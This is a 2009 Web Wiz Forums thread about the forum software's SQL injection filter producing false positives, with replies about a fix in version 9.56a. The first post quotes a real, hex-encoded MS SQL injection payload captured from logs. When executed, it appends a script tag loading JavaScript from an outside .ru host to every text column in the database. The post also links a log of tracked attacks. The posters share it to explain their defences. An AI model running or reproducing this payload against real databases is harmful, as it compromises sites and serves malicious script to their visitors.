Web Wiz - Green Windows Web Hosting
Web Wiz Homepage Search Web Wiz

  New Posts New Posts RSS Feed - FYI on SQL Injection
  FAQ FAQ  Forum Search   Events   Register Register  Login Login

FYI on SQL Injection
 Post Reply Post Reply
Author
  Topic Search Topic Search  Topic Options Topic Options
ohiopbx View Drop Down
Groupie
Groupie


Joined: 21 February 2005
Location: United States
Status: Offline
Points: 124 		Post Options Post Options   Thanks (0) Thanks(0)   Quote ohiopbx Quote  Post ReplyReply Direct Link To This Post Topic: FYI on SQL Injection
    Posted: 26 March 2009 at 7:37pm
Afternoon, I appreciate the effort to minimize SQL injection, however the implementation of the SQLInjetion functions seems to hurt the forum than it does make it better. I get a lot errors b/c my topic titles are like "where-can-i-pick-up-a-bob-long" and the "where" is causing the issue.

I've dealt with SQL injection and this is an example of a true sql injection:
;DECLARE @S VARCHAR(4000);SET @S=CAST(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F7777772E6B6F7266642E72752F6E67672E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F7220 AS VARCHAR(4000));EXEC(@S);-- IP: 117.193.131.212


Here is a link to all the injections I have tracked for one client of mine:
http://johnbauctions.com/gallery/images/log/lastUpdated.txt

So I just wanted to share this.

Cody
Back to Top
Scotty32 View Drop Down
Moderator Group
Moderator Group


Joined: 30 November 2002
Location: Manchester, UK
Status: Offline
Points: 1682 		Post Options Post Options   Thanks (0) Thanks(0)   Quote Scotty32 Quote  Post ReplyReply Direct Link To This Post Posted: 26 March 2009 at 7:59pm
Make sure you are running v9.56a as there was a bug in V9.56.

(had a look at your homepage and your on 9.56)
S2H.co.uk - WebWiz Mods and Skins

For support on my mods + skins, please use my forum.
Back to Top
ohiopbx View Drop Down
Groupie
Groupie


Joined: 21 February 2005
Location: United States
Status: Offline
Points: 124 		Post Options Post Options   Thanks (0) Thanks(0)   Quote ohiopbx Quote  Post ReplyReply Direct Link To This Post Posted: 26 March 2009 at 8:08pm
got ya, i'll look for A
Back to Top
WebWiz-Bruce View Drop Down
Admin Group
Admin Group
Avatar
Web Wiz Developer

Joined: 03 September 2001
Location: Bournemouth
Status: Offline
Points: 9844 		Post Options Post Options   Thanks (0) Thanks(0)   Quote WebWiz-Bruce Quote  Post ReplyReply Direct Link To This Post Posted: 27 March 2009 at 10:30am
The SQL Injection Examples that you have are specific to one type of virus that was very rampant about 10 months ago. There are 100's of different ways to do SQL Injections which is why the SQL Injection test within Web Wiz Forums is more generic to try and capture all types of SQL Injection, not just the one type in the examples you have.

SQL Injections are quite a complex subject. Probably somewhere in the region of 500 hours have been spent on this with Web Wiz Forums investigation many different types of SQL Injection across different database types. It's something worth looking into as there are many hacking sites devoted to this subject which are worth checking out to make sure your own sites are fully protected against this type of vulnerability.

The issue that you have with your own forum with the false/positives has been fixed with release 9.56a. The issue doesn't effect users who are using the new URL Rewrite Tool.
Web Wiz Forums Hosting
ASP.NET Web Hosting
Back to Top
billd3 View Drop Down
Senior Member
Senior Member


Joined: 19 February 2003
Location: United States
Status: Offline
Points: 530 		Post Options Post Options   Thanks (0) Thanks(0)   Quote billd3 Quote  Post ReplyReply Direct Link To This Post Posted: 27 March 2009 at 6:17pm
My brain hurts..

Guess I'd better download again, LOL
BillD
http://theamcpages.com
http://theamcforum.com
Back to Top
 Post Reply Post Reply

Forum Jump Forum Permissions View Drop Down

Forum Software by Web Wiz Forums® version 12.08
Copyright ©2001-2026 Web Wiz Ltd.

Become a Fan on Facebook Follow us on X Connect with us on LinkedIn Web Wiz Blogs
About Web Wiz | Contact Web Wiz | Terms & Conditions | Cookies | Privacy Notice

Web Wiz is the trading name of Web Wiz Ltd. Company registration No. 05977755. Registered in England and Wales.
Registered office: Web Wiz Ltd, Unit 18, The Glenmore Centre, Fancy Road, Poole, Dorset, BH12 4FB, UK.

Prices exclude VAT at 20% unless otherwise stated. VAT No. GB988999105 - $, € prices shown as a guideline only.

Copyright ©2001-2026 Web Wiz Ltd. All rights reserved.